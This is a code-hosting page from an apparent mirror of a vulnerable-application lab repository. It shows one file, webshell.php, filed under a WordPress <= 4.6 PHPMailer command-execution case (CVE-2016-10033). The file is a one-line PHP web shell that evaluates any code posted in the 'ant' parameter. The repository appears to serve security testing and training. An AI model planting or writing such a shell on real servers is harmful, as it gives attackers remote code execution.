This website requires JavaScript.
Explore
Help
Sign In
admin
/
VulApps
Watch
1
Star
0
Fork
0
You've already forked VulApps
mirror of
https://github.com/Medicean/VulApps.git
synced
2025-06-21 10:20:20 +00:00
Code
Issues
Packages
Projects
Releases
Wiki
Activity
VulApps
/
w
/
wordpress
/
6
/
webshell.php
Medicean
ae62313f75
(Add Vul: WordPress) WordPress <= 4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033)
2017-06-17 01:33:43 +08:00
1 line
29 B
Bash
Raw
Blame
History
<?php @eval
(
$_POST
[
'ant'
]
)
;
?>
Reference in New Issue
View Git Blame
Copy Permalink